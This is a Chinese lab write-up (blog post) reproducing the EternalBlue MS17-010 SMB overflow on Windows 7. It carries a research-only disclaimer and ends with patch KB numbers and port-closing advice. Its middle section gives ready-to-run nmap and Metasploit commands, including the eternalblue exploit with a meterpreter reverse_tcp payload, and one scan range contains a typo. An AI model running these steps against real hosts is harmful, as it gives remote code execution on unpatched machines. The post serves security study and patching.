【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
文章目录
- 声明
- 前言
- 一、漏洞原理简述
- 二、漏洞代码深层解析
- 三、实验步骤
- 四、漏洞补丁
- 总结
声明
本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记!
前言
Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码
一、漏洞原理简述
MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数 srv!SrvOs2FeaListToNt 在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt 去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
二、漏洞代码深层解析
参考如下文章对Windows7 MS17-010 永恒之蓝漏洞做了详细的解析,代码层面的漏洞产生方式
https://blogs.360.net/post/nsa-eternalblue-smb.html#toc-772
https://blog.csdn.net/qq_27446553/article/details/73480807
三、实验步骤
本地测试
- 攻击机:KALI Linux (192.168.52.129)
- 靶机:Windows 7 x64 (192.168.52.x)
使用 nmap 进行本地存活主机探测
nmap -T4 -sC -sV 192.168.52.0/24
发现该主机开放445端口,并且还是一个Windows 7 Professional 操作系统
使用 MetaSploit 工具对目标进行检测
search ms17_010 //搜索MS17_010利用模块
首先,对目标主机进行漏洞探测
模块一:
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.52.131
exploit
模块二:
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.131
exploit
由上述测试结果,发现目标主机存在 MS17-010 漏洞,接下来使用 exploit 模块进行攻击利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.52.131
exploit
至此,MS17-010 漏洞利用完成✅
对于主机存活探测,可使用msf的模块进行扫描
use auxiliary/scanner/discovery/udp_sweep
set rhosts 1921.68.52.1-192.168.52.254
exploit
四、漏洞补丁
使用如下网站提供对应补丁编号进行下载修复
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012215/KB4012212
添加系统的入站规则;关闭 445、135、138、139 等端口
总结
该漏洞利用风险极高,对于使用Windows 7 系统用户及时更新系统补丁,以免造成不必要的影响。
此漏洞涉及到SMB服务,对SMB有兴趣研究的可以参考这篇文章
–>https://www.cnblogs.com/aisa/p/8624720.html
【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)相关推荐
- 漏洞复现-永恒之蓝(MS17-010)
目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透 一,漏洞介绍 1,永恒之蓝是什么? 永恒之蓝是指2017年4月14 ...
- python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
1.Metaspolit介绍 Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新 ...
- MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现
MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现 文章目录 MS08-067远程代码执行漏洞(CVE-2008-4250 ...
- 利用MS08067远程溢出漏洞抓肉鸡
利用MS08067远程溢出漏洞抓肉鸡 陈小兵 [antian365.com] 微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波 ...
- 一步到位的 UPnP 远程溢出漏洞实战
远程溢出***漏洞 (Remote Buffer Overflow Vulnerability) 是远程直接***被黑 电脑或服务器最典型.最常见的漏洞,原因无它,只要溢出成功并运行 ShellCod ...
- linux远程溢出,Linux netkit in.telnetd远程溢出漏洞
Linux netkit in.telnetd远程溢出漏洞 2008-04-09 04:30:32来源:互联网 阅读 () Linux netkit in.telnetd远程溢出漏洞 发布日期:200 ...
- 【漏洞复现】MS17-010漏洞(永恒之蓝)复现
永恒之蓝漏洞复现 漏洞复现 对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接 实验准备:win7 (192.168.217.153).win10.kali.Xshell 实验步骤: 漏洞 ...
- metasploit复现永恒之蓝漏洞
Table of Contents 0x01 设备 0x02 条件 0x03 漏洞复现 0x04 漏洞利用 00x0 后话 0x01 设备 内置metasploit的kali Linux: win7. ...
- 三、Kali Linux复现永恒之蓝漏洞
配置需求: 1.攻击机:Kali Linux (IP:192.168.1.100) 2.目标靶机:Winodws7 3.同一局域网 前言: 只知道目标靶机处于同一局域网的情况下,对目标靶机进行渗透攻击 ...
最新文章
- linux架构接口层教程,在LINUX平台上进行成功实现RIL层功能和框架层应用
- C语言关键字--volatile(不稳定的,反复无常的)
- jvm性能调优实战 - 32一个10万并发的BI系统,如何定位和解决频繁Young GC问题?
- mysql 之后,装完MySQL之后的一些操作
- UVALive - 7511 Multiplication Table(暴力+模拟)
- 我的WCF之旅(1):创建一个简单的WCF程序
- 524. 通过删除字母匹配到字典里最长单词
- android menuitem 字体颜色,安卓更改Menu的字体颜色(使用actionLayout,适用于多个fragment)...
- 《精通ArcGIS Server 应用与开发》——1.5 ArcGIS 10时态
- 若依如何修改数据监控登录账户密码?
- inotify java maven_inotifywait + rsync 监控文件并同步
- OmegaXYZ知识图谱应用Github仓库(长期更新)
- 二、自定义控件之RadioButtonList
- 杭电 HOJ 3038 How Many Answers Are Wrong 解题报告
- python抽签程序_【一点资讯】python打造一个抽奖程序 www.yidianzixun.com
- linux ps命令是什么,linux中的ps命令的详细解释
- MyBatis 类型转换器
- Python制作卡点视频
- python语言进行生日悖论分析--随机试验方法
- 吉利有后手,魅族没有